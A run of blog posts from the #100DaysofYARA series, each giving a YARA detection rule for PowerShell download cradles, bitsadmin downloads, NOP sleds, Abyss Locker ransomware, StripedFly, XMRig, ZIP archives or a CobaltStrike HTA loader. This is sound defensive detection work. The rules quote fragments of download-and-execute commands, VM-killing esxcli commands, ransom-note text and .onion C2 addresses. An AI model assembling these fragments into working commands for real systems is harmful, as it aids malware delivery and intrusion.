#100DaysofYARA 2024 – Day 51 – PowerShell Download Commands

There are so many ways to obfuscate PowerShell commands that this might seem like a bit of a waste of time, but today’s rule attempts to find simple PowerShell download commands.

rule TTP_PowerShell_Download_command {
	meta:
		description = "Matches strings commonly found in PowerShell download cradles."
		last_modified = "2024-02-20"
		author = "@petermstewart"
		DaysofYara = "51/100"
		ref = "https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters"

	strings:
		$a = "powershell" nocase ascii wide
		$b = "IEX" nocase ascii wide
		$c = "New-Object" nocase ascii wide
		$d = "Net.Webclient" nocase ascii wide
		$e = ".downloadstring(" nocase ascii wide

	condition:
		4 of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 50 – Bitsadmin Downloads

We’re halfway through the 100 days! Microsoft’s Background Intelligent Transfer Service can be used to proxy execution of binaries or execute from an Alternate Data Stream, but is more commonly used maliciously to download files from an external host.

rule TTP_BITS_Download_command {
	meta:
		description = "Matches strings commonly found when creating new BITS download jobs."
		last_modified = "2024-02-19"
		author = "@petermstewart"
		DaysofYara = "50/100"
		ref = "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"

	strings:
		$a = "bitsadmin /create" nocase ascii wide
		$b = "/addfile" nocase ascii wide
		$c = "/complete" nocase ascii wide
		$d = "http" nocase ascii wide

	condition:
		all of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 49 – NOP Sleds

A NOP sled is a sequence of No Operation instructions commonly used when exploiting buffer overflow vulnerabilities. These rules hunt for sequences of 8, 16, and 32 NOP (0x90) bytes; I have no idea if this is actually an effective method of identifying exploit binaries!

rule HUNT_nopsled_8 {
	meta:
		description = "Matches 8 repeated no-operation hex bytes - 0x90"
		last_modified = "2024-02-18"
		author = "@petermstewart"
		DaysofYara = "49/100"
        
    strings:
    	$a = { 90 90 90 90 90 90 90 90 }

	condition:
		filesize < 5MB and
		$a
}

rule HUNT_nopsled_16 {
	meta:
		description = "Matches 16 repeated no-operation hex bytes - 0x90"
		last_modified = "2024-02-18"
		author = "@petermstewart"
		DaysofYara = "49/100"
        
    strings:
    	$a = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }

	condition:
		filesize < 5MB and
		$a
}

rule HUNT_nopsled_32 {
	meta:
		description = "Matches 32 repeated no-operation hex bytes - 0x90"
		last_modified = "2024-02-18"
		author = "@petermstewart"
		DaysofYara = "49/100"
        
    strings:
    	$a = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }

	condition:
		filesize < 5MB and
		$a
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 48 – Abyss Locker Ransomware Note

Today’s rule matches strings in the note dropped by the Abyss Locker ransomware, based on analysis published by SentinalOne.

rule MAL_AbyssLocker_ransomnote {
	meta:
		description = "Matches strings found in SentinelOne analysis of Abyss Locker note."
		last_modified = "2024-02-17"
		author = "@petermstewart"
		DaysofYara = "48/100"
		ref = "https://www.sentinelone.com/anthology/abyss-locker/"

	strings:
		$a1 = "Your company Servers are locked and Data has been taken to our servers. This is serious."
		$a2 = "Good news:"
		$a3 = "100% of your Server system and Data will be restored by our Decryption Tool;"
		$a4 = "for now, your data is secured and safely stored on our server;"
		$a5 = "nobody in the world is aware about the data leak from your company except you and Abyss Locker team."
		$a6 = "Want to go to authorities for protection?"
		$a7 = "they will do their job properly, but you will not get any win points out of it, only headaches;"
		$a8 = "they will never make decryption for data or servers"
		$a9 = "Also, they will take all of your IT infrastructure as a part of their procedures"
		$a10 = "but still they will not help you at all."
		$a11 = "Think you can handle it without us by decrypting your servers and data using some IT Solution from third-party non-hackers"

	condition:
		filesize < 5KB and
		8 of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 47 – Abyss Locker Ransomware (Linux)

According to analysis published by SentinelOne, Abyss Locker has been operating a Linux variant targeting ESXi environments since March 2023. This rule matches strings based on their analysis.

rule MAL_AbyssLocker_Lin_strings {
	meta:
		description = "Matches strings found in SentinelOne analysis of Linux variant of the Abyss Locker ransomware."
		last_modified = "2024-02-16"
		author = "@petermstewart"
		DaysofYara = "47/100"
		ref = "https://www.sentinelone.com/anthology/abyss-locker/"

	strings:
		$a1 = "Usage:%s [-m (5-10-20-25-33-50) -v -d] Start Path"
		$b1 = "esxcli vm process list"
		$b2 = "esxcli vm process kill -t=force -w=%d"
		$b3 = "esxcli vm process kill -t=hard -w=%d"
		$b4 = "esxcli vm process kill -t=soft -w=%d"
		$c1 = ".crypt" fullword
		$c2 = "README_TO_RESTORE"

	condition:
		uint32(0) == 0x464c457f and
		all of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 46 – StripedFly “Cryptominer”

In October 2023 Kaspersky Labs published a write-up of an interesting Tor-based C2 framework which masqueraded as a cryptominer. I couldn’t find any samples despite Kaspersky’s claim of observing infections in the hundreds of thousands, so this rule is a bit speculative.

rule HUNT_StripedFly {
	meta:
		description = "Matches strings found in Kaspersky Labs analysis of StripedFly malware."
		last_modified = "2024-02-15"
		author = "@petermstewart"
		DaysofYara = "46/100"
		ref = "https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/"

    strings:
    	$a1 = "gpiekd65jgshwp2p53igifv43aug2adacdebmuuri34hduvijr5pfjad.onion" ascii wide
		$a2 = "ghtyqipha6mcwxiz.onion" ascii wide
		$a3 = "ajiumbl2p2mjzx3l.onion" ascii wide
		$b1 = "HKCU\\Software\\Classes\\TypeLib" ascii wide
		$b2 = "uname -nmo" ascii wide
		$b3 = "%s; chmod +x %s; nohup sh -c \"%s; rm %s\" &>/dev/null" ascii wide
		$b4 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters" ascii wide

	condition:
		(uint16(0) == 0x5a4d or uint32(0) == 0x464c457f) and
		1 of ($a*) and
		1 of ($b*)
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 45 – XMRig

XMRig is an open-source cross-platform cryptominer, available on Github and often on compromised webservers following mass-exploitation campaigns. Today’s rule matches strings found in a Windows XMRig sample, which was also flagged up by my generic cryptominer string rule from Day 32.

rule MAL_XMRig_strings {
	meta:
		description = "Matches strings found in XMRig cryptominer samples."
		last_modified = "2024-02-14"
		author = "@petermstewart"
		DaysofYara = "45/100"
		sha256 = "3c54646213638e7bd8d0538c28e414824f5eaf31faf19a40eec608179b1074f1"

	strings:
		$a1 = "Usage: xmrig [OPTIONS]"
		$a2 = "mining algorithm https://xmrig.com/docs/algorithms"
		$a3 = "username:password pair for mining server"
		$a4 = "--rig-id=ID"
		$a5 = "control donate over xmrig-proxy feature"
		$a6 = "https://xmrig.com/benchmark/%s"
		$a7 = "\\xmrig\\.cache\\"
		$a8 = "XMRIG_INCLUDE_RANDOM_MATH"
		$a9 = "XMRIG_INCLUDE_PROGPOW_RANDOM_MATH"
		$a10 = "'h' hashrate, 'p' pause, 'r' resume, 's' results, 'c' connection"

	condition:
		7 of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 44 – Password-Protected ZIP Files

Most of the ZIP files I have collected recently are password-protected – with a small addition to yesterday’s rule we can flag those up too.

rule file_zip_password_protected {
    meta:
        description = "Finds files that look like password-protected ZIP archives"
        last_modified = "2024-02-13"
        author = "@petermstewart"
        DaysofYara = "44/100"
        ref = "https://en.wikipedia.org/wiki/ZIP_(file_format)"
        ref = "https://twitter.com/tylabs/status/1366728540683599878"

    strings:
        $local_file_header = { 50 4b 03 04 }
        $central_directory_header = { 50 4b 01 02 }
        $end_of_central_directory = { 50 4b 05 06 }
        
    condition:
        $local_file_header at 0 and
        uint16(6) & 0x1 == 0x1 and //Check the general purpose bit flag in the local file header
        $central_directory_header and
        $end_of_central_directory
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 43 – ZIP Files

I have a lot of ZIP files laying around from collecting malware samples. Today’s rule matches on parts of the file header.

rule file_zip {
    meta:
        description = "Finds files that look like ZIP archives"
        last_modified = "2024-02-12"
        author = "@petermstewart"
        DaysofYara = "43/100"
        ref = "https://en.wikipedia.org/wiki/ZIP_(file_format)"

    strings:
        $local_file_header = { 50 4b 03 04 }
        $central_directory_header = { 50 4b 01 02 }
        $end_of_central_directory = { 50 4b 05 06 }
        
    condition:
        $local_file_header at 0 and
        $central_directory_header and
        $end_of_central_directory
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 42 – CobaltStrike HTA Loader

One other aspect of CobaltStrike I hadn’t seen many public YARA rules for is the HTA Beacon loader, so that’s what today’s rule tries to match.

Again, this rule uses YARA’s base64 modifier and so may not work on older versions.

rule MAL_CobaltStrike_HTA_loader {
    meta:
        description = "Matches strings found in CobaltStrike HTA loader samples."
        last_modified = "2024-02-11"
        author = "@petermstewart"
        DaysofYara = "42/100"
        sha256 = "2c683d112d528b63dfaa7ee0140eebc4960fe4fad6292c9456f2fbb4d2364680"
        ref = "https://embee-research.ghost.io/malware-analysis-decoding-a-simple-hta-loader/"

    strings:
        $header = "<script>"
        $a1 = "%windir%\\\\System32\\\\"
        $a2 = "/c powershell -w 1 -C"
        $b1 = "-namespace Win32Functions" base64 wide
        $b2 = "[Byte[]];[Byte[]]$" base64 wide
        $b3 = "{Start-Sleep 60};" base64 wide
        $b4 = "[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(" base64 wide
        $b5 = "\\syswow64\\WindowsPowerShell\\v1.0\\powershell\";iex" base64 wide
        $b6 = "else{;iex \"& powershell" base64 wide

    condition:
        $header at 0 and
        all of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.